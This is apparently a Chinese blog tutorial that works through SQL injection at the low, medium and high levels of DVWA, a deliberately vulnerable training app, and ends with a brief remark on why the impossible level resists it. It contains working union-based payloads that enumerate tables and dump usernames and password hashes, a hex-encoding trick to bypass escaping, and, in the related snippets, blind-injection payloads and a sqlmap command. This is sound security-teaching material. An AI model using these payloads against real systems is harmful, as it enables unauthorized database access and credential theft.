DVWA-SQL注入

最新推荐文章于 2024-10-02 23:45:00 发布
原创 最新推荐文章于 2024-10-02 23:45:00 发布 · 413 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #网络安全

目录

SQL Injection SQL注入

SQL 注入的攻击行为可以描述为通过用户可控参数中注入SQL 语法,破坏原有SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以
归结为以下两个原因叠加造成的:

  • 程序员在处理程序和数据库交互时,使用字符串拼接的方式构造SQL 语句。
  • 未对用户可控参数进行足够的过滤,便将参数内容拼接到SQL 语句中。

low

  1. 判断注入类型

    1
2
//正常回显,可用联合查询
2'
//报错,可用报错注入,字符型注入,闭合类型'

    在这里插入图片描述

  2. 判断列数

    1' order by 1 #
1' order by 2 #
1' order by 3 #
//报错,说明总共有两列

在这里插入图片描述

  1. 判断回显位置

    -2' union select 1,2; #

在这里插入图片描述

  1. 使用联合查询,查询数据库和版本号

    -2' union select database(),version(); #

在这里插入图片描述

  1. 查询表名

    -2' union select count(*),0 from information_schema.tables where
table_schema=database(); #
//查询有几个表
-2' union select group_concat(table_name),0 from information_schema.tables where table_schema=database(); #
//查询表名

在这里插入图片描述

在这里插入图片描述

  1. 获取列名

    -2' union select group_concat(column_name),0 from information_schema.columns where table_schema=database() and table_name='users'; #

在这里插入图片描述

  1. 查询获取到的信息

    -2' union select user,password from users; #

在这里插入图片描述

  1. 密码被MD5加密,可以在网站进行破解

medium

  1. 用bp抓包,判断注入类型

    id=1
id=2
//有回显,可以进行联合查询
id=2'
//有报错信息,可以进行报错注入,数字型注入,闭合类型'

在这里插入图片描述

  1. 判断列数

    id=2 order by 1;
id=2 order by 2;
id=2 order by 3;
//报错,有两列

在这里插入图片描述

  1. 判断回显位置

    id=2 union select 1,2;

在这里插入图片描述

  1. 开始联合注入,查询数据库和版本号

    id=2 union select version(),database();

在这里插入图片描述

  1. 查询表

    id=2 union select count(*),0 from information_schema.tables where table_schema=database();
//查询表数量
id=2 union select group_concat(table_name),0 from information_schema.tables where table_schema=database();
//查询表名

在这里插入图片描述

  1. 查询列

    id=2 union select group_concat(column_name),0 from information_schema.columns where table_schema=database() and table_name='users';
//查询列名,发现'被转义,试试",也被转义,转十六进制
id=2 union select group_concat(column_name),0 from information_schema.columns where table_schema=database() and table_name=0x7573657273;

在这里插入图片描述

  1. 查询数据

    id=2 union select user,password from users

在这里插入图片描述

high

  1. 发现需要进入一个新页面

在这里插入图片描述

  1. 判断注入类型

    1
2
//回显不同,可以联合查询
2'
//有报错信息,可以进行报错注入,数字型注入

在这里插入图片描述

  1. 判断列数

    2 order by 1;
2 order by 2;
//回显一样?看看源代码,发现被limit限制只输入第一条命令,那直接把limit注释掉,要考虑'闭合,注释可以用-- (注意有个空格)和#
2' order by 1;# 
2' order by 2;# 
2' order by 3;# 
//报错,有两列

在这里插入图片描述

  1. 判断注入点

    2' union select 1,2;#

在这里插入图片描述

  1. 联合查询,获取数据库名和版本号

    2' union select database(),version();#

在这里插入图片描述

  1. 查询表

    2' union select count(*),0 from information_schema.tables where table_schema=database();#
//查询表数量
2' union select group_concat(table_name),0 from information_schema.tables where table_schema=database();#
//查询表名

在这里插入图片描述

  1. 查询列

    2' union select group_concat(column_name),0 from information_schema.columns where table_schema=database() and table_name='users';#

在这里插入图片描述

  1. 查询数据

    2' union select user,password from users;#

在这里插入图片描述

impossible

在这里插入图片描述

impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为1时,才成功输出,这样就有效预防了脱库,加入了Anti-CSRFtoken机制,进一步提高了安全性。

dvwa——sql注入
GZY0601的博客
09-16 811
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWA靶场通关——SQL Injection篇
sucker的博客
11-14 4729
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。在第二段代码中,$id 变量同样从 $_POST 数组中获取,但在传递给SQL查询之前,使用 mysqli_real_escape_string 函数对其进行了转义处理,从而减少了SQL注入的风险。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。"i"表示$id是一个整数。
DVWA通关攻略之SQL注入
hongji728696的博客
09-03 2154
SQL注入是发生在应用程序与数据库的安全漏洞,简而言之,即黑客将Web页面原参数修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行SQL命令,从而实现获取数据库的信息以及提权目的的一种技术。
DVWA——SQL注入
qq_62803993的博客
01-08 2723
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWASQL注入
RexHa的博客
09-27 2460
DVWA靶场sql注入三个级别通关
DVWA-master.7z 压缩包
09-14
- SQL注入:通过构造特定的输入,攻击者可以执行恶意的SQL命令。 - 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非...
DVWA-SQL注入sqlmap安装和使用)
m0_64037702的博客
07-12 1256
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
DVWA-master 靶场环境
02-22
它模拟了一个典型的Web应用程序,其中包含了大量的常见安全漏洞,例如SQL注入、跨站脚本(XSS)、文件上传漏洞等。这些漏洞是故意设计的,目的是为了给学习者提供一个实际操作的机会,让他们在安全的环境下学习如何...
DVWA-master安装包
02-28
1. **注入漏洞**:包括SQL注入、命令注入等,通过在用户输入的数据中插入恶意代码,攻击者可以获取数据库信息甚至控制服务器。 2. **跨站脚本(XSS)**:分为反射型和存储型两种,XSS允许攻击者通过注入可执行的...
DVWA下的SQL注入
07-25
SQL
DVWASQL 注入
Hacker_feng的博客
10-02 875
1' or 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()# // 查询当前数据库dvwa 中的表。这里也可以通过输入union select 1,2,3…输入:1' union select 1,2#输入: 1' or '1'='1。
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 2235
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
dvwasql注入
BAIXUAN9527的博客
03-27 626
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWASQL Injection
谢公子的博客
08-05 7430
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 手工注入思路 自动化的注入神器sqlmap...
DVWASQL注入(盲注)
天空之蓝的博客
11-17 4855
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA -SQL Injection (Blind)进行布尔盲注注入,获取表名
最新发布
06-14
### 布尔盲注在DVWA中的应用及获取表名的教程 布尔盲注是一种基于逻辑判断的SQL注入技术,通过向数据库发送特定构造的SQL查询语句,并根据返回页面内容的变化来推断出数据库的信息。在DVWA(Damn Vulnerable Web Application)中,可以通过布尔盲注的方法逐步获取数据库中的表名。 #### 1. 确定数据库的字符集和表名长度 首先需要确定数据库中表名的长度以及所使用的字符集。可以使用以下SQL查询构造来判断表名的长度: ```sql ' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1))=N--+ ``` 将`N`替换为不同的数字,直到找到使页面返回结果发生变化的值,这表示当前表名的长度为`N`[^1]。 #### 2. 使用二分法或逐字符猜测表名 一旦确定了表名的长度,就可以逐字符地猜测表名。通过ASCII码比较,构造如下SQL查询: ```sql ' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),M,1))>N--+ ``` 其中: - `M`是当前正在猜测的字符位置。 - `N`是用于比较的ASCII码值。 通过不断调整`N`的值并观察页面响应,可以逐步缩小范围,最终确定每个字符的具体值[^2]。 #### 3. 自动化工具辅助 手动进行布尔盲注的过程较为繁琐,可以借助自动化工具如`sqlmap`来加速这一过程。例如,运行以下命令即可尝试从目标URL中提取表名: ```bash sqlmap -u "http://target/dvwa/vulnerabilities/sqli_blind/" --level=5 --risk=3 --technique=B --tables ``` 此命令会自动探测并利用布尔盲注漏洞来枚举所有表名[^3]。 #### 注意事项 - 在实际操作中,请确保拥有合法权限,避免违反相关法律法规。 - DVWA环境通常用于教育目的,建议在本地搭建环境中练习此类技术。 ```python # 示例代码:简单的布尔盲注逻辑模拟 def boolean_blind_injection(base_url, payload_template, char_position, guess_value): payload = payload_template.format(char_position, guess_value) response = requests.get(base_url, params={'id': payload, 'Submit': 'Submit'}) return "True" if "exists" in response.text else "False" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值